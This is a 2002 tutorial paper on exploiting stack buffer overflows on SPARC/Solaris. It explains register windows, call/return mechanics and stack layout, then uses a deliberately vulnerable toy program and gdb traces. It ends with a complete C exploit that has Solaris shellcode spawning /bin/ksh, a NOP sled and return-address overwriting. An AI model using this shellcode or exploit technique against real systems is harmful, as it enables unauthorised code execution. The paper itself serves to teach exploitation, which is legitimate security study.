" IT'S TOASTED " Exploiting SPARC Buffer Overflow vulnerabilities by pr1 <pr1@u-n-f.com> ----/ Contents 1 - Introduction 2 - Architecture Overview 2.1 - Sparc Registers 2.2 - Sparc Pipeline 2.3 - Instruction Size 2.4 - Function Calls 2.5 - Leaf and Optimized Leaf Procedures 2.6 - Sparc Stack 3 - A Demonstration Vulnerability 3.1 - Studying the overflow in theory 3.2 - Studying the overflow with gdb 4 - Building an exploit 4.1 - Major differences between Sparc and x86 4.2 - Alignment 4.3 - The exploit 5 - Alternative ways of exploiting 6 - Conclusion 7 - References 8 - Greets ----/ 1 - Introduction Sparc is a RISC architecture build by Sun Microsystems. It´s supported by many operating systems like Solaris, Linux, OpenBSD, NetBSD,... As Sun decided to develop Solaris >= 9 for Sparc only and as there is not much information on Sparc overflows on the net i decided to write this article. There are some major differences in handling the calling and returning from functions and stack management on Sparc that are worth knowing. If you ever asked yourselve: "Why am I unable exploit this simply strcpy() in main() on Sparc ...". This paper has the answer. ----/ 2 - Architecture Overview There are 32 general purpose registers on Sparc at any given time. 8 of them are global, these are the "global" registers. They are called %g0 - %g7 and are consistent during procedure calls. Then there are another 24 registers in a so called register window. A window consists of 3 types of registers. The "in", "out" and "local" registers. A Sparc implementation can have from 2-32 windows thus having 40 - 520 registers. ( remember that the global registers are static ) The variable number of registers is the reason to call Sparc scalable. At any given time only one window is visible. This window is determined by the CWP ( current window pointer ) which is part of the PSR ( processor status register in Sparc V8 ). Its a whole register in Sparc V9. These instructions are primarily used for procedure calls. The concept is that "in" registers contain procedure arguments, "local" registers can be used for storing values while the procedure executes, "out" registers contain outgoing arguments. The "global" registers are used for values that do not change much between procedure calls. The register windows overlap partially. The SAVE operation renames the "out" registers to become the "in" registers of the called procedure. Because procedure calls are a quite frequent operation this was meant to improve performance. Actually this was a bad idea caused by studies that only considered insolated programs. The drawback is: With interaction with the system the registers have to be stored on the stack which results in a lot of slow store and load instructions. ----/ 2.1 - Sparc Registers The Registers are organized as follows: %g0 - %g7 ( %r0 - %r7 ) : global - registers %o0 - %o7 ( %r8 - %r15 ) : out - registers, they contain arguments for procedure calls %l0 - %l7 ( %r16 - %r23 ): local - registers, use them for local variables %i0 - %i7 ( %r24 - %r31 ): in - registers, after a procedure call these registers contain incoming arguments Some special registers: %g0 : always contains zero ( hardwired ) %sp ( %o6 ): the stack pointer, points to the top of the stack frame ( the last element pushed onto it ) %o7 : called subroutines return address %fp ( %i6 ): the frame pointer, points to the bottom of the stack frame %i7 : subroutine return address ( return address - eight ) %o0 : return value from called subroutine ----/ 2.2 - The Sparc Pipeline The Sparc Architecture uses a pipeline to improve performance. A pipeline is used to fetch/execute more instructions in the same time as without a pipeline. Usually there are several steps until a CPU finishes the execution of an instruction. The instruction has to be fetched, decoded, executed, branches have to be completed ( pc = npc ) and results have to be written to the destination. Doing all this things and then start from the beginning with the next instruction is a waste of time. Thus a pipeline was implemented to fetch instructions. While it decodes the first instruction it fetches the next one... and so on. Using this technique several instructions can be executed almost in parallel. How these steps are implemented differs from pipeline to pipeline. The Sparc pipeline has a depth of two. Hence there is a PC and a nPC ( next Program counter pointing to the next instruction to be executed ). nPC is always copied into PC after the current instruction was executed. You might ask yourself what happens if the CPU executes a branch instruction ( jumps somewhere ) and already has the next instrucion in the pipeline. It´s unknown at compile time whether this branch will be taken or not. The allready fetched instruction could simply be discarded but this would be a perfomance lost. Thus the Sparc architecture executes the instruction following the branch instruction before the branch is taken. e.g.: call subroutine <- %o0 is allready zero here xor %o0,%o0,%o0 <- executed before call This is known as a branch delay slot. ---/ 2.3 - Instruction size The x86 instructions differ in their length. Sparc uses a pipeline to improve perfomance and the designers found it easier to implement every instruction as a four byte opcode sequence. But this also means that a NOP has a length of four bytes as well. Usually this would be a little problem ( consider what happens if we jump into the middle of a NOP ). Because we have to care about alignment this problem vanishes soon though. ---/ 2.4 - Function calls The Sparc architecture uses the call/ret instruction pair to implement procedure calls. Both the CALL and RET instruction are so called synthetic instructions. The hardware equivalent instruction ( the instruction assembled into the binary ) is a jump ( jmpl ). Note "l" stands for link not for long. The assembler plays a bigger role on executinoi speed on RISC than on CISC: * The assembler reorders instruction to a logical eqivalent procedure to prevent different pipeline hazards. * It also optimizes branch delay slots via placing instructions in there. * It inlines macros of synthetic instructions or even compounds instructions. For example: * call subroutine == jmpl subroutine,%o7 ( remember that %o7 contains the called subroutines return address ) * ret == jmpl %i7+8,%g0 ( remember that %i7 is ret address - 8, %g0 always contains zero ) The CALL instruction saves the current value of PC in %o7, updates PC and sets nPC to the address specified in the CALL. The RET instruction updates PC and sets nPC to %i7+8. 8 bytes are added to the address because the address saved in %i7 is the address of the call instruction. Because all instructions have a size of four bytes and there is a branch delay slot of four bytes after the call we have to skip eight bytes. %i7 is used instead of %o7 because the SAVE instruction renamed the "out" register to "in" registers. Next thing a procedure does is building some stack space to store automatic ( local ) variables, compiler temporaries, pointer to return value, ... This is done with the SAVE and RESTORE instructions. * SAVE: The SAVE instruction reserves stack space for the above mentioned things. Its syntax is: save %sp, imm(ediate value), %sp. SAVE now makes the old %sp the new %fp, adds imm to the old %sp and stores the new value in the new %sp. Because the stack grows down imm should be a negative value. The CPW flag in the PSR register is also decremented. ( out registers become in registers ). Note that on Sparc V9 the behaviour is a little different. Sparc V9 has a seperate register for CWP. SAVE increments the CWP and RESTORE decrements it. * RESTORE: RESTORE now increments CWP ( Sparc V9 decrements ) the CPW. In registers become the out registers. The eight input registers and the eight local registers are restored to the values they contained before the most recent SAVE instruction. The restore instruction then acts like an add instruction except that the source registers are from the old register set and the destination register is from the new register set. Making %fp the new %sp. A procedure epilogue and prologue thus look like: save %sp, -368, %sp .... .... .... ret restore Restore is executed one slot later in the pipeline, but its effects take place before ret changes the %pc. ---/ 2.5 - Leaf and Optimized Leaf Procedures A leaf procedure is a procedure that does not call any other procedures. A routine that does not allocate a register window of its own by calling the SAVE instruction is termed an optimized leaf procedure. One way to recognize an optimized leaf procedure is by scanning the output of the assembly code instructions and noting the absence of a SAVE instruction. Leaf routines do not have a stack frame allocated to them. Leaf routines use their caller's stack frame and register window. If the routine is leaf the previous frames PC should be looked up in register %o7. Otherwise it needs to be looked up in register %i7, which is what register %o7 becomes after a SAVE instruction. This is what defines leafness. ---/ 2.6 - The Sparc Stack High Addresses /-----------------------\ %fp -> cw | automatic variables | \-----------------------/ /----------------------------------\ cw | space allocated with alloca() | \----------------------------------/ /----------------------------------\ cw | space for compiler temporaries | \----------------------------------/ /----------------------------------\ cl | outgoing parameters | \----------------------------------/ /----------------------------------------\ cl | copies of outgoing parameters | \----------------------------------------/ /----------------------------------------\ cl | one word ( hidden parameter ) | \----------------------------------------/ /-----------------------------------------------\ %sp -> cl | 64 byte for possible copy of register window | \-----------------------------------------------/ Low Addresses The stack consists of 2 parts: Current Workspace ( cw ): The current workspace is used by C procedures. It consists of automatic variables, space allocated by alloca() and space for compiler temporaries. When writing an assembly routine you only have to calculate space for temporary values you need. Call Linkage ( cl ): This space is required to save outgoing registers and the register window when control passes to another procedure. The Call Linkage is important for exploiting Sparc overflows. The minimum stack frame size is 96 byte. It consists of: * 64 bytes for copy of register window * 6 * 4 bytes for outgoing parameters * 4 bytes for the hidden parameter This are only 92 byte but the stack and frame pointer require to be on a eight byte boundary ( 92 is not divisible by eight ). Hence the minimum stack frame size is 96 byte. The reason to be on a eight byte boundary is that there is at least space for one temporary variable. As the current workspace contains a dynamically allocated field( alloca() ). We can not tell how much blocks this will be at compile time. Hence automatic variables are accessed via %fp as negative offsets and the others are accessed via %sp as positives offsets. ----/ 3 - A demonstration vulnerability Not every buffer overflow is exploitable on Sparc. We need at least one level of nesting function to be able to exploit it. void copy( const char *a ){ char buf[256]; strcpy(buf,a); } main( int argc, char *argv[] ) { copy( argv[1] ); } ---/ 3.1 - Studying the overflow in theory Let us recall what happens on function calls and function returns. %i7 contains main´s return address. It will return into exit() in _start to perform cleanup before program termination. main() calls copy(), jmpl ( call ) saves the return address back into main() in register %o7 and the SAVE instruction in/decrements the register window renaming %o7 into %i7. %i7 is allready filled with main´s() return address into exit() though. Thus main´s() register window is stored on copy´s() stack frame. %i7 contains now copy´s() return address back into main. strcpy() follows the same algorithm. After strcpy() overwrites parts of our stack we also overwrite copy´s() initial stack frame. Strcpy´s() stack frame and its stored return address back into copy() are still intact and strcpy() returns back into copy(). All register contents are still intact but copy´s() stack frame is damaged. Copy() finally restores and jumps back to main(). But main´s() register window was saved on copy´s() stack frame and damaged by our overflown strcpy(). When returning back into main() the saved/damaged register window is restored. The input and local registers now contain user supplied data. When main() returns it would usually jump into exit() in _start to perform cleanup, but as we changed the return address it jumps into nowhere ( 0x61616161 ) and dies with a SIGBUS error. ---/ 3.2 - Studying the overflow with gdb Let us feed this into gdb and see what happens. Note that i have deleted redundant information like static registers that are not saved in the register windows to shorten the output and to make the overflowing process clearer. This are our registers in main before copy is called. (gdb) info register sp 0xffbef838 o7 0x106c0 l0 0xc l1 0xff3400a4 l2 0xff33c5d8 l3 0x0 l4 0x0 l5 0x0 l6 0x0 l7 0xff3e6694 i0 0x2 i1 0xffbef90c i2 0xffbef918 i3 0x20870 i4 0x0 i5 0x0 fp 0xffbef8a8 i7 0x104c8 This is our stack frame before copy() is called. Thats our saved register window. Note the saved PC at 0xffbef874. (gdb) x/96x $sp %sp -> 0xffbef838: 0x0000000c 0xff3400a4 0xff33c5d8 0x00000000 [%l0 - %l3] 0xffbef848: 0x00000000 0x00000000 0x00000000 0xff3e6694 [%l4 - %l7] 0xffbef858: 0x00000002 0xffbef90c 0xffbef918 0x00020870 [%i0 - %i3] 0xffbef868: 0x00000000 0x00000000 0xffbef8a8 0x000104c8 [%i4 - %i7] . . . . . . . . . . . . . . . %fp -> 0xffbef9a8: 0x00000003 0x00010034 0x00000004 0x00000020 Breakpoint 5, 0x10610 in copy () Register values in copy() before the call to strcpy(). (gdb) info register sp 0xffbef6c8 o7 0x0 l0 0x0 l1 0x0 l2 0x0 l3 0x0 l4 0x0 l5 0x0 l6 0x0 l7 0x0 i0 0xffbefa37 i1 0xffbef910 i2 0xffbef90c i3 0x300 i4 0x2371c i5 0xff29bbc0 fp 0xffbef838 i7 0x10640 And the stack frame befor the strcpy() call. Note how the saved register window ( of main() ) moved "below" our input buffer. This is the register window of copy(). We will not be able to overwrite the PC at 0xbffef704 because its "above" our input buffer. This PC contains the return address back to main. (gdb) x/96x $sp %sp -> 0xffbef6c8: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbef6d8: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbef6e8: 0xffbefa37 0xffbef910 0xffbef90c 0x00000300 0xffbef6f8: 0x0002371c 0xff29bbc0 0xffbef838 0x00010640 [saved PC] . . . . . . . . . . . . . . . buf -> 0xffbef728: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbef738: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbef748: 0x00000000 0x00000000 0x00000000 0x00000000 . . . . . . . . . . . . . . . %fp -> 0xffbef838: 0x0000000c 0xff3400a4 0xff33c5d8 0x00000000 0xffbef848: 0x00000000 0x00000000 0x00000000 0xff3e6694 0xffbef858: 0x00000002 0xffbef90c 0xffbef918 0x00020870 0xffbef868: 0x00000000 0x00000000 0xffbef8a8 0x000104c8 <- PC ( PC to exit (in _start ) ) Breakpoint 6, 0x1061c in copy () Register values after strcpy() overflowed the buffer. (gdb) info register sp 0xffbef6c8 o7 0x10614 l0 0x0 l1 0x0 l2 0x0 l3 0x0 l4 0x0 l5 0x0 l6 0x0 l7 0x0 i0 0xffbefa37 i1 0xffbef910 i2 0xffbef90c i3 0x300 i4 0x2371c i5 0xff29bbc0 fp 0xffbef838 i7 0x10640 And the corrupted stack frame. (gdb) x/96x $sp 0xffbef6c8: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbef6d8: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbef6e8: 0xffbefa37 0xffbef910 0xffbef90c 0x00000300 0xffbef6f8: 0x0002371c 0xff29bbc0 0xffbef838 0x00010640* . . [ * PC to main still intact ] . . . . . . . . . . . . . . . buf-> 0xffbef728: 0x61616161 0x61616161 0x61616161 0x61616161 0xffbef738: 0x61616161 0x61616161 0x61616161 0x61616161 0xffbef748: 0x61616161 0x61616161 0x61616161 0x61616161 0xffbef758: 0x61616161 0x61616161 0x61616161 0x61616161 . . . . . . . . . . . . . . . 0xffbef868: 0x61616161 0x61616161 0x61616161 0x61616161* [* PC to exit damaged ] Very nice. We were able to alter main´s() saved PC into exit. After copy() restores the in and local registers are set to the "saved/damaged" values. Hence we altered these values due to the overflow of the input buffer the in and local registers contain our supplied values. Breakpoint 7, 0x10648 in main () (gdb) info register sp 0xffbef838 o7 0x10640 l0 0x61616161 l1 0x61616161 l2 0x61616161 l3 0x61616161 l4 0x61616161 l5 0x61616161 l6 0x61616161 l7 0x61616161 i0 0x61616161 i1 0x61616161 i2 0x61616161 i3 0x61616161 i4 0x61616161 i5 0x61616161 fp 0x61616161 i7 0x61616161 <- next ret will jump here+8 Main is now about to cleanup and jump into exit. But as we altered it´s saved PC it will jump into 0x61616161+8 and die. ----/ 4 - Building an exploit In this section we will build an exploit for the the vulnerability we just studied. We also list some differences between x86 and Sparc exploitation and cover alignment issues. ---/ 4.1 - Differences between x86 and Sparc exploitation * memory access: On x86 as on most CISC processors we can write to unaligned memory addresses without the CPU complaining. Sometimes we only have to adjust the alignment. Not so on Sparc. See more about alignment at 4.2. Note that writing to unaligned memory addresses is a CPU feature of the x86 family. It will complain if the AC ( alignment check ) flag is set in the flag register. * call/ret internals: Because of the internal working of the sparc stack frames and ret/call pairs we need at least one level of nesting function to be able to exploit a buffer overflow vulnerability on a Sparc. * finding the stack base address: Sparc Solaris uses a different stack base address on different architectures. - sun4u: 0xffbe...., - sun4m: 0xefff...., - sun4d: 0xdfff.... We can get the stack base address with the following assembler snippet: unsigned long get_sp( void ) { __asm__(" or %sp, %sp, %i0 " ); } * size of overflow: On a Sparc we usually have to be able to write more than just a few bytes beyond the target buffer. This is because we have to overwrite at least %l0 - %l7 and %i0 - %i6 before reaching the saved return address. * overwriting an address with one byte: Overflowing an address with one byte on x86 lets us control the least significant byte. Chances are good that we can alter some stack address a little bit to point into our shellcode. As Sparc is a big endian architecture we can only write from most to least significant byte. Thus we can alter only the most significant order byte with a one byte overflow. This decreases our chances of providing some usefull address. See [3] for more details on one byte overflows. ---/ 4.2 - Alignment As most other RISC processors Sparc does not allow unaligned memory accesses. This means we must not read from, write to or jump to any address that is not on a 4 byte boundary. Otherwise the CPU generates a Bus Error exception and our program dies. Also consider what happened if we jumped into the middle of one of our NOPs. Remember that every Sparc instruction is 4 bytes long. It is very probable that the processor would generate an Illegal Instruction exception and our program crashed as well. That is why we have to take care that our exploit return address is a multiple of 4, our shellcode lies at a 4 byte boundary in our attack buffer and our attack buffer itself is a multiple of 4. ---/ 4.3 - Exploiting the vulnerability Note that we take care about writing only to aligned memory addresses. If we put our shellcode to some unaligned address in our attack buffer we will never be able to reach it. Same with the nops. Unaligned nops makes us jump into the middle of a nop everytime we would reach the nops. This results in an Illegal Instruction exception and our program dies without executing our code. We also have to set %fp to a "save" address or the retl instruction will crash. A "save" address simply is some stack address. We could also use our return address to overwrite %fp. /* Exploits toy vulnerbility on Sparc/Solaris * * pr1 * June 2002 */ #include/* lsd - Solaris shellcode */ static char shell[]= /* 10*4+8 bytes */ "\x20\xbf\xff\xff" /* bn,a */ "\x20\xbf\xff\xff" /* bn,a */ "\x7f\xff\xff\xff" /* call */ "\x90\x03\xe0\x20" /* add %o7,32,%o0 */ "\x92\x02\x20\x10" /* add %o0,16,%o1 */ "\xc0\x22\x20\x08" /* st %g0,[%o0+8] */ "\xd0\x22\x20\x10" /* st %o0,[%o0+16] */ "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */ "\x82\x10\x20\x0b" /* mov 0x0b,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "/bin/ksh" ; #define BUFSIZE 336 /* SPARC NOP */ static char np[] = "\xac\x15\xa1\x6e"; unsigned long get_sp( void ) { __asm__("or %sp,%sp,%i0"); } main( int argc, char *argv[] ) { char buf[ BUFSIZE ],*ptr; unsigned long ret,sp; int rem,i,err; ret = sp = get_sp(); if( argv[1] ) { ret -= strtoul( argv[1], (void *)0, 16 ); } /* align return address */ if( ( rem = ret % 4 ) ) { ret &= ~(rem); } bzero( buf, BUFSIZE ); for( i = 0; i < BUFSIZE; i+=4 ) { strcpy( &buf[i], np ); } memcpy( (buf + BUFSIZE - strlen( shell ) - 8),shell,strlen( shell )); ptr = &buf[328]; /* set fp to a save stack value */ *( ptr++ ) = ( sp >> 24 ) & 0xff; *( ptr++ ) = ( sp >> 16 ) & 0xff; *( ptr++ ) = ( sp >> 8 ) & 0xff; *( ptr++ ) = ( sp ) & 0xff; /* we now overwrite saved PC */ *( ptr++ ) = ( ret >> 24 ) & 0xff; *( ptr++ ) = ( ret >> 16 ) & 0xff; *( ptr++ ) = ( ret >> 8 ) & 0xff; *( ptr++ ) = ( ret ) & 0xff; buf[ BUFSIZE -1 ] = 0; #ifndef QUIET printf("Return Address 0x%x\n",ret); #endif err = execl( "./vul", "vul", buf, ( void *)0 ); if( err == -1 ) perror("execl"); } ----/ 5 - Alternative ways of exploitation As we saw very small overruns are not as likely to be exploitable on Sparc as they are on other platforms. But let us consider some special cases where you are able to overwrite other sensitive information on the stack. An example is overwriting a programs function pointer or jumpbuf with the address of system and telling it to execute /bin/sh. See [4] for more information about overwriting such structures. On sparc the text segment is mapped to small addresses. If we now try to overwrite this function pointer/jumpbuf with some other function - address. We can not write this small address into the register without any 0x00 bytes. This is because we can only write from most to least significant byte on Sparc. An alternative way is placing shellcode onto the stack and overwriting the function pointer with the shellcodes stack address which comprises eight bytes. Because of Alignment restrictions on Sparc we can´t exploit format string vulnerabilities via the "%n" directive.( Writing one byte 4 times ) by using the short qualifier the alignment is emulated either in software or special machine instructions are used, and you can usually write on every two byte boundary. See [6] for more information. The return into libc technique can also be applied on Solaris/Sparc to defeat non executable stack patches. See [7] for more information. Dynamic heap overflows via corruption of malloc internal structures are exploitable on Sparc as well. See [8] and [9] for a glibc and the SysV malloc implementation and exploitation discussion. ----/ 6 - Conclusion We need a bit more luck to be able to exploit Sparc buffer overflows than their brothers/sisters on x86. In general it is not enough to be able to overwrite just a few bytes of the buffer. Additionaly we saw that the way the stack is handled has a great influence on the exploitability issue of its buffer overrun vulnerabilities. This class of vulnerablities can not always be exploited on Sparc as there must exist at least one level of subroutine calls nesting, so that two concurrent ret/restore pairs can be executed by a vulnerable program after its stack got overrun. ----/ 7 - References [1] UNF - United Net Frontier [http://www.u-n-f.com] [2] Sun Microsystems Sparc Assembly Language Reference Manual [http://www.sparc.org] [3] Klog Frame pointer overwriting [http://www.phrack.org/show.php?p=55&a=8] [4] Matt Conover aka. Shok w00w00 on Heap Overflows [http://www.w00w00.org/files/articles/heaptut.txt] [5] some interesting pdfs about computer architectures [http://www.segfault.net/~scut/cpu] [6] Scut Exploiting Format String vulnerabilities [http://www.team-teso.net/releases/formatstring-1.2.tar.gz] [7] Horizon Return into libc exploits on Sparc/Solaris [http://packetstormsecurity.nl/groups/horizon/stack.txt] [8] Maxx Exploiting dynamic heap overflows via malloc chunk corruption. [http://www.phrack.org/phrack/57/p57-0x08] [9] Exploiting dynamic heap overflows via malloc chunk corruption. [http://www.phrack.org/phrack/57/p57-0x09] ----/ 8 - Greetings - Big thx to Scut for reviewing the paper - Svoern for mental support - all the other UNF fellows